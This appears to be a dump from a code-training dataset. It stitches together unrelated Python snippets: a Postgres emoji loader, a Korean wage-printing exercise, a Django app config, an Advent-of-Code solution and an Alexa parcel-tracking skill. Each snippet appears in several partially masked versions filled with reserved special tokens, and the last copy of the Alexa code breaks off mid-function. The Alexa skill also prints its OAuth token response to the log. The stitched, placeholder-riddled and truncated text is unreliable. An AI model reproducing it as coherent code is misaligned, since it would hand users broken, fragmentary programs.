"step-5": "from Psql_Database_Setup import *\r\nimport requests, json\r\n\r\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\r\nBase.metadata.bind = engine\r\n\r\nDBSession = sessionmaker(bind=engine)\r\nsession = DBSession()\r\n\r\nresponse = requests.get(\"https://api.github.com/emojis\")\r\nresponse = json.loads(response.text)\r\n\r\nfor key,value in response.items():\r\n Emoji = Emojis(name=key, url = value)\r\n session.add(Emoji)\r\n session.commit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
<|reserved_special_token_1|>
wage = 5
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
<|reserved_special_token_1|>
wage=5
print("%d시간에 %d%s 벌었습니다." %(1, wage*1, "달러"))
print("%d시간에 %d%s 벌었습니다." %(5, wage*5, "달러"))
print("%d시간에 %.1f%s 벌었습니다" %(1,5710.8,"원"))
print("%d시간에 %.1f%s 벌었습니다" %(5, 28554.0, "원"))
|
flexible
|
{
"blob_id": "2092ead8b8f268a22711b8af8052241c1ac00c15",
"index": 14,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n",
"step-3": "wage = 5\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n",
"step-4": "\nwage=5\n\nprint(\"%d시간에 %d%s 벌었습니다.\" %(1, wage*1, \"달러\"))\nprint(\"%d시간에 %d%s 벌었습니다.\" %(5, wage*5, \"달러\"))\n\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(1,5710.8,\"원\"))\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(5, 28554.0, \"원\"))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
<|reserved_special_token_0|>
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CheckoutConfig(AppConfig):
name = 'checkout'
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
from django.apps import AppConfig
class CheckoutConfig(AppConfig):
name = 'checkout'
def ready(self):
import checkout.signals
<|reserved_special_token_1|>
from django.apps import AppConfig
class CheckoutConfig(AppConfig):
name = "checkout"
# Override the ready method and import the signals module
# so that update_on_save and update_on_delete will be called
# after an OrderLineItem model instance is saved or deleted
def ready(self):
import checkout.signals
|
flexible
|
{
"blob_id": "74e3f4cd7b09d9b96feb3f927a509b113481eaed",
"index": 7575,
"step-1": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n <mask token>\n\n def ready(self):\n import checkout.signals\n",
"step-3": "<mask token>\n\n\nclass CheckoutConfig(AppConfig):\n name = 'checkout'\n\n def ready(self):\n import checkout.signals\n",
"step-4": "from django.apps import AppConfig\n\n\nclass CheckoutConfig(AppConfig):\n name = 'checkout'\n\n def ready(self):\n import checkout.signals\n",
"step-5": "from django.apps import AppConfig\n\n\nclass CheckoutConfig(AppConfig):\n name = \"checkout\"\n\n # Override the ready method and import the signals module\n # so that update_on_save and update_on_delete will be called\n # after an OrderLineItem model instance is saved or deleted\n def ready(self):\n import checkout.signals\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from day6input import *
groups = input.split('\n\n')
count = 0 #1
groupanswers = [] #2
for group in groups:
allananswers = set(list('abcdefghijklmnopqrstuvwxyz')) #2
answers = set() #1
people = group.split('\n')
for person in people:
allananswers = allananswers & set(list(person)) #2
#1
for answer in person:
if answer not in answers:
answers.add(answer)
count = count + 1
groupanswers.append(allananswers) #2
print(count) #1
#####2
answer2 = 0
for group in groupanswers:
answer2 = answer2 + len(group)
print(answer2)
|
normal
|
{
"blob_id": "8f1ec65ca60605747f46f596e0b5848922bcd0b5",
"index": 2127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\n<mask token>\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-3": "<mask token>\ngroups = input.split('\\n\\n')\ncount = 0\ngroupanswers = []\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-4": "from day6input import *\ngroups = input.split('\\n\\n')\ncount = 0\ngroupanswers = []\nfor group in groups:\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz'))\n answers = set()\n people = group.split('\\n')\n for person in people:\n allananswers = allananswers & set(list(person))\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n groupanswers.append(allananswers)\nprint(count)\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)\n",
"step-5": "from day6input import *\n\ngroups = input.split('\\n\\n')\n\ncount = 0 #1\ngroupanswers = [] #2\n\nfor group in groups:\n\n allananswers = set(list('abcdefghijklmnopqrstuvwxyz')) #2\n answers = set() #1\n\n people = group.split('\\n')\n for person in people:\n\n allananswers = allananswers & set(list(person)) #2\n\n #1\n for answer in person:\n if answer not in answers:\n answers.add(answer)\n count = count + 1\n\n groupanswers.append(allananswers) #2\n\nprint(count) #1\n\n#####2\nanswer2 = 0\nfor group in groupanswers:\n answer2 = answer2 + len(group)\nprint(answer2)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
<|reserved_special_token_0|>
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
<|reserved_special_token_0|>
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':
{'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,
'content': 'SessionSpeechlet - ' + output}, 'reprompt': {
'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},
'shouldEndSession': should_end_session}
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = 'Now give remaining digits'
reprompt_text = 'Now give the next eleven numbers'
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,
tracking_number_2, tracking_number_3, tracking_number_4,
tracking_number_5, tracking_number_6, tracking_number_7,
tracking_number_8, tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print('session after adding first ten--->')
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = (
'There was some problem, Please provide first ten digits of the tracking number'
)
reprompt_text = 'Please say first ten digits of the tracking number'
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import print_function
import traceback
import requests
import os
import json
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':
{'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,
'content': 'SessionSpeechlet - ' + output}, 'reprompt': {
'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},
'shouldEndSession': should_end_session}
def build_response(session_attributes, speechlet_response):
return {'version': '1.0', 'sessionAttributes': session_attributes,
'response': speechlet_response}
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = 'Welcome to PB Parcel Tracker'
speech_output = 'Please give first 10 digits of tracking number'
reprompt_text = 'Please give first 10 digits of tracking number'
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = 'Session Ended'
speech_output = (
'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')
should_end_session = True
return build_response({}, build_speechlet_response(card_title,
speech_output, None, should_end_session))
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = 'Now give remaining digits'
reprompt_text = 'Now give the next eleven numbers'
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,
tracking_number_2, tracking_number_3, tracking_number_4,
tracking_number_5, tracking_number_6, tracking_number_7,
tracking_number_8, tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print('session after adding first ten--->')
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = (
'There was some problem, Please provide first ten digits of the tracking number'
)
reprompt_text = 'Please say first ten digits of the tracking number'
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = 'There was some problem in taking your input'
reprompt_text = 'Please say remaining digits of the tracking number'
try:
tracking_number_11 = intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,
tracking_number_12, tracking_number_13, tracking_number_14,
tracking_number_15, tracking_number_16, tracking_number_17,
tracking_number_18, tracking_number_19, tracking_number_20,
tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = '%s%s' % (session['attributes']['first_ten'],
tracking_number)
bearer = 'Bearer %s' % session['access_token']
print('USPS FULL Tracking Number ----> %s' % full_tracking_number)
url = (
'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'
% full_tracking_number)
r = requests.get(url, headers={'Authorization': bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if r.status_code == 200:
speech_output = 'The status of the parcel is ' + tracking_response[
'status']
reprompt_text = 'The status of the parcel is ' + tracking_response[
'status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or 'attributes' in session and
'first_ten' not in session['attributes']):
speech_output = (
'Please provide only first ten digits of the tracking number')
reprompt_text = (
'Please provide only first ten digits of the tracking number')
else:
speech_output = (
'There was some problem, Please say remaining digits of the tracking number'
)
reprompt_text = (
'Please say remaining digits of the tracking number')
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def on_session_started(session_started_request, session):
""" Called when the session starts """
print('on_session_started requestId=' + session_started_request[
'requestId'] + ', sessionId=' + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print('on_launch requestId=' + launch_request['requestId'] +
', sessionId=' + session['sessionId'])
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = 'Basic ' + access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={'Authorization': access_key_value,
'Content-Type': 'application/x-www-form-urlencoded'}, data={
'grant_type': 'client_credentials'})
print(r.status_code)
if r.status_code == 200:
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print('on_intent requestId=' + intent_request['requestId'] +
', sessionId=' + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if 'access_token' not in session:
oauth_request(session)
print(session['access_token'])
if intent_name == 'Tracking':
return setFirstEleven(intent, session)
elif intent_name == 'TrackingSecond':
return getParcelStatus(intent, session)
elif intent_name == 'AMAZON.HelpIntent':
return get_welcome_response()
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':
return handle_session_end_request()
else:
raise ValueError('Invalid intent')
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print('on_session_ended requestId=' + session_ended_request['requestId'
] + ', sessionId=' + session['sessionId'])
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print('event.session.application.applicationId=' + event['session'][
'application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == 'LaunchRequest':
return on_launch(event['request'], event['session'])
elif event['request']['type'] == 'IntentRequest':
return on_intent(event['request'], event['session'])
elif event['request']['type'] == 'SessionEndedRequest':
return on_session_ended(event['request'], event['session'])
<|reserved_special_token_1|>
"""
Code for Alexa skill to check PB tracking
"""
from __future__ import print_function
import traceback
import requests
import os
import json
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
""" If we wanted to initialize the session to have some attributes we could
add those here
"""
session_attributes = {}
card_title = "Welcome to PB Parcel Tracker"
speech_output = "Please give first 10 digits of tracking number"
# If the user either does not reply to the welcome message or says something
# that is not understood, they will be prompted again with this text.
reprompt_text = "Please give first 10 digits of tracking number"
should_end_session = False
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you for trying the Alexa Skills Kit sample. " \
"Have a nice day! "
# Setting this to true ends the session and exits the skill.
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
#----- get tracking ------
def setFirstEleven(intent, session):
session_attributes = {}
should_end_session = False
speech_output = "Now give remaining digits"
